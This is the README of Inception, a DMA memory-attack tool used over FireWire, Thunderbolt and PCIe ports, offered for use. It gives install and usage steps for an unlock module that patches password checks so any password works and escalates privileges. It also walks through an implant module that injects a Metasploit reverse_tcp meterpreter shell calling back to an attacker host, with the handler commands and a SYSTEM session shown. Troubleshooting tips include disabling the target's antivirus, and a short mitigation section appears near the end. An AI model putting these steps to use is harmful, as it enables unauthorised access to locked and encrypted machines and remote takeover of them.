Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.
Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.
Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.
Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.
After running that module you should be able to log into the victim machine using any password.
An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.
The world’s forensics experts, governments and three-letter acronym agencies are using similar tools already, so why not? Inception is free, as in beer. A professional equivalent tool will set you back ~10 000 USD. Hack back!
- Version: 0.4.0
- License: GPL
- Author: Carsten Maartmann-Moe ([email protected]) AKA ntropy
- Twitter: @breaknenter
- Site: http://www.breaknenter.org/projects/inception
- Download / source: https://github.com/carmaa/inception
The tool makes use of the
libforensic1394 library courtesy of Freddie Witherden under a LGPL license.
- Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
- Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
- Python 3
- gcc (incl. g++)
- pip (for automatic resolution of dependencies)
On Debian-based distributions the installation command lines can be summarized as:
sudo apt-get install git cmake g++ python3 python3-pip
On OS X, you can install the tool requirements with homebrew:
brew install git cmake python3
After installing the requirements, download and install libforensic1394:
git clone git://git.freddie.witherden.org/forensic1394.git cd forensic1394 cmake CMakeLists.txt sudo make install cd python sudo python3 setup.py install
git clone git://github.com/carmaa/inception.git cd inception ./setup.py install
The setup script should be able to install dependencies if you have
- Connect the attacker machine (host) and the victim (target) with a FireWire cable
- Run Inception
incept [module name]
For a more complete and up-to-date description, please run:
or see the tool home page.
As of version 0.4.0, Inception has been modularized. The current modules, and their functionality is described below.
For detailed options on usage, run:
incept [module name] -h
Note: Mavericks since 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D effectively blocking DMA requests and thwarting almost all modules. Look for
vtd fault entries in your log/console.
unlock module can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. module is primarily attended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that doesn’t pack encryption.
The unlock module is stable on machines that has 4 GiB of main memory or less. If your the target has more then that, you need to be lucky in order to find the signatures mapped to a physical memory page frame that the tool can reach.
As of this version, it is able to unlock the following x86 and x64 operating systems:
|OS||Version||Unlock lock screen||Escalate privileges|
|Mac OS X||Mavericks||Yes (1)||Yes (1)|
|Mac OS X||Mountain Lion||Yes (2)||Yes (2)|
|Mac OS X||Lion||Yes (2)||Yes (2)|
|Mac OS X||Snow Leopard||Yes||Yes|
|Mac OS X||Leopard|
(1): Mavericks since 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D effectively blocking DMA requests and thwarting this attack. Look for
vtd fault entries in your log/console. (2): If FileVault 2 is enabled, the tool will only work when the operating system is unlocked as of OS X Lion. (2): Other Linux distributions that use PAM-based authentication may also work using the Ubuntu signatures.
The module also effectively enables escalation of privileges, for instance via the
sudo -scommands, respectively.
To unlock, simply type:
incept unlock _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _| _| _|_| _| _| _| _| _| _| _| _| _| _|_| _| _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _| _| _| _|_| _| _| _| _| _| _| _| _| _|_| _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _| v.0.4.0 (C) Carsten Maartmann-Moe 2014 Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter [?] Will potentially write to file. OK? [y/N] y [*] Available targets (known signatures):  Windows 8 MsvpPasswordValidate unlock/privilege escalation  Windows 7 MsvpPasswordValidate unlock/privilege escalation  Windows Vista MsvpPasswordValidate unlock/privilege escalation  Windows XP MsvpPasswordValidate unlock/privilege escalation  Mac OS X DirectoryService/OpenDirectory unlock/privilege escalation  Ubuntu libpam unlock/privilege escalation  Linux Mint libpam unlock/privilege escalation [?] Please select target (or enter 'q' to quit): 2 [*] Selected target: Windows 7 MsvpPasswordValidate unlock/privilege escalation [=============> ] 227 MiB ( 22%) [*] Signature found at 0xe373312 in page no. 58227 [*] Patch verified; successful [*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!
implant module implants a (potentially memory-only) Metasploit payload directly to the volatile memory of the target machine. It integrates with MSF through the
msfrpcd daemon that is included in all versions of Metasploit.
The current version only work as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future. If you want to change this, send me a wad of cash in unmarked dollar bills or a pull request.
To use it, start
msfrpcd -P [password]
Then launch inception:
incept implant --msfpw [password] --msfopts [options]
As an example, to create a reverse TCP meterpreter shell from the target machine to your attacking host, first start the
msfrpcd dameon, and then launch a console listening for callbacks.
msfrpcd -P password msfconsole
In the console, we configure the receiving end of the payload. We’re setting the
EXITFUNC option to
thread to ensure that the target process stays alive if something should go awry:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 172.16.1.1 set EXITFUNC thread set ExitOnSession false exploit -j
Then, in another terminal, we launch Inception:
incept implant --msfpw password --msfopts LHOST=172.16.1.1 _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _| _| _|_| _| _| _| _| _| _| _| _| _| _|_| _| _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _| _| _| _|_| _| _| _| _| _| _| _| _| _|_| _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _| v.0.4.0 (C) Carsten Maartmann-Moe 2014 Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter [?] Will potentially write to file. OK? [y/N] y [!] This module currently only work as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future. If you want to change this, send me a wad of cash in unmarked dollar bills or a pull request on github. [?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp [*] Selected options: [*] LPORT: 4444 [*] LHOST: 172.16.1.1 [*] EXITFUNC: thread [*] Stage 1: Searcing for injection point [================================> ] 537 MiB ( 53%) [*] Signature found at 0x219d118c in page no. 137681 [*] Patching at 0x219d118c [\] Waiting to ensure stage 1 execution [*] Restoring memory at initial injection point [*] Stage 2: Searching for page allocated in stage 1 [=========================> ] 434 MiB ( 42%) [*] Signature found at 0x1b2d9000 in page no. 111321 [*] Patching at 0x1b2d9000 [*] Patch verified; successful [*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!
In your MSF console, you should see something similar to this:
msf exploit(handler) > [*] Sending stage (769536 bytes) to 172.16.78.200 [*] Meterpreter session 1 opened (172.16.1.1:4444 -> 172.16.78.200:49178) at 2014-08-30 16:23:31 +0200 msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WIN-11FMQRBAMJ6 172.16.1.1:4444 -> 172.16.78.200:49178 (172.16.78.200) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Not working you say? Here’s a couple of hints:
- First, use the -v switch to visually confirm that the tool is able to read memory from the victim.
- Make sure you actually are connected with a IEEE134 FireWire cable (FireWire to USB converters, etc. won’t work, but 4/6/9 pin FireWire adapters do). Doh.
- “Nofirewire devices detected on the bus”
- First, try running the tool again.
- If you get this error message, try a different cable and/or using a couple of converters (such as this and this) to convert from 6/9 pin FireWire connector to 4 pin and back again. 6/9 pin FireWire cables are capable of transferring power, and this may cause trouble for some FireWire chipsets. Some FireWire cables are also known to be “straight-through” (i.e., not “crossover”), an this is known to cause trouble.
- Are you attacking from an OS that doesn’t support hot-plugging (such as BackTrack) using a ExpressCard/etc. on the host side? Re-boot the machine with the expansion card plugged in before running Inception.
- Are you sure you’re getting DMA? Sometimes the target machine uses an extended period of time (I’ve experienced time-spans up to around 30 secs on slow targets) installing the FireWire drivers and lowering the DMA shield; it is possible that you just didn’t wait long enough before attacking. Use the delay switch to increase the delay, and -v/–verbose to see if you actually read data. Also, looking in the Device Manager (assuming you are setting up a demo attacking Windows) may be helpful to see that a FireWire SBP2 device actually pops up when running the tool. Mind you, it is all right with a yellow exclamation mark by the device, the tool should work nevertheless.
- Does your target use some form of endpoint protection? Some antivirus vendors specifically block FireWire DMA. Turn it off and see what happens.
- Does your FireWire port work? Try connecting a FireWire disk and see if it is recognized. Check your BIOS setting to see that it is not disabled. Ensure that FireWire drivers are present and not removed from the system.
- Are you getting data, but still can’t find the signature? Check the above and see the FAQ below. Also check the amount of RAM installed (FireWire max addressable memory space is 4 GiB). The code may lie above that threshold, in which case the unlock attack won’t work. This is especially true for Linux machines, where kernel code resides in high memory addresses.
- Did Inception patch successfully, but you cannot log in? Try a non-blank password. Some OS authentication mechanisms check for blank passwords before passing control to the mechanism that Inception patches.
- Try again. Sometimes the DMA shield fails to lower on the first try/tries.
- Due to severe bugs in the Mac OS X FireWire stack IOKit, attacking from a Mac can cause a kernel panic at the target and/or host system if an error condition should occur. As of March 2012, attacking from Mac OS X is not recommended.
- Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool look for may be loaded at a memory address >
0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, search for encryption keys.
- You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that doesn’t map to hardware RAM.
- OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for versions before 10.7.2, where the vulnerability is patched.
- If you have a OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.
To stay safe and protect against FireWire DMA attacks, here’s a couple of suggestions:
- Block the SBP-2 driver
- Remove FireWire drivers from your system if you don’t need to use FireWire
- Don’t panic – if you are using FileVault2 and OS X Lion (10.7.2) and higher, the OS will automatically turn off DMA when locked – you’re still vulnerable to attacks when unlocked, though
- Set a firmware password
- Disable DMA or remove the 1394 drivers (see the ‘Mitigation: Linux’ section)
All of the above will impact FireWire in one way or the other. Unfortunately, this is a FireWire design problem, not an OS problem, and would have to be fixed in the SBP-2 protocol itself.
Inception was originally coded as a GPL replacement for winlockpwn, the Windows FireWire unlock tool made available by Adam Bolieu aka Metlstorm. winlockpwn was quite stable against older Windows XP targets, but did not perform well against more modern operating system like Windows 7 (and it is not maintained anymore). As of Linux kernel 2.6.22 Linux Distros ships with the new ‘Juju’ FireWire stack, making winlockpwn obsolete. Alas, Inception was born.
DMA attacks has been known for many years, so this is nothing new (except for the fact that I will reverse engineer new signatures and update the tool’s functionality until the problem is fixed). However, vendors generally dismiss DMA attacks as a non-issue, which I hope that the awareness that this tool generates will change. Users deserve secure devices, even when attackers gain physical access.
- Q: This tool is irrelevant, I can just boot the machine with [insert live CD OS here], dump the SAM and SECURITY hives and crack the passwords.
A: No, you can’t if the target is a full disk encrypted machine. See above. This tool is designed to unlock powered on machines that utilize secure, full disk encryption. It is also far stealthier than the above attack.
- Q: Can’t I just use the screen_unlock.rb Metasploit script?
A: Well you can, assuming that you already have a shell at the target machine. If you have that, you probably won’t need this tool.
- Q: I use full disk encryption. Your tool is moot.
A: No, you’re missing the point: The tool is intended to be used against full disk encrypted machines. Se FAQ 1.
- Q: This is FUD! I would never let anyone plug anything into my machine! I’m never more than an arm’s length from my computer. In fact, my machine is the only object I have a non-platonic relationship with, and I would never let my eyes off her. No one would go to the trouble of hacking a single machine anyway.
A: Good for you. The attack is dependent on physical access to a box in a powered on or standby state, so likely you’ll not be hacked. However, there are organizations out there that would go to utmost lengths to be able to access machines in seconds without leaving a trace. If you are not a target of these organizations, you’re likely never going to be hacked this way. However, if it is your job to be paranoid, you should know about this attack and make an informed decision to protect yourself.
- Q: I’ve just glued/desoldered all my Firewire ports. Your move, mhuddafuckah.
A: Ahem. See the answer to FAQ 7.
- Q: Wasn’t this fixed years ago? I remember hearing about this in the olden days (2004).
A: Sadly, no. And yes, the problem is old, but it is not entirely fixable with a driver update, a patch or a new OS version. The problem is in the Firewire specs. All OS vendors that want to include Firewire drivers that are OHCI compliant and works out of the box with SBP-2 devices are vulnerable in some degree.
- Q: Isn’t FireWire a dying horse? Few laptops ship with FireWire ports these days, which makes Inception a useless tool.
A: You can use any interface that expands the PCIe bus, for example PCMCIA, ExpressCards, the new Thunderbolt interface and perhaps SD/IO to hotplug a FireWire interface into the victim machine. The OS will install the necessary drivers on the fly, even when the machine is locked.
- Q: Your tool isn’t working.
A: That’s not a question. Check the troubleshooting section above first, and when you have made sure that the error source isn’t between the chair and the keyboard, preferably open an issue at github describing the problem, including:
- Your host OS
- The target OS (For Windows, the output of running winver.exe on the machine, format: major.minor.build, for Linux the output of uname -a and perhaps cat /etc/lsb-release)
- The target CPU architecture (x86/x64, etc.)
- Output of the tool
- Memory size of target
License / donate
If you like tool, and especially if you use it successfully in a digital investigation, please consider making a donation to me:
My Bitcoin address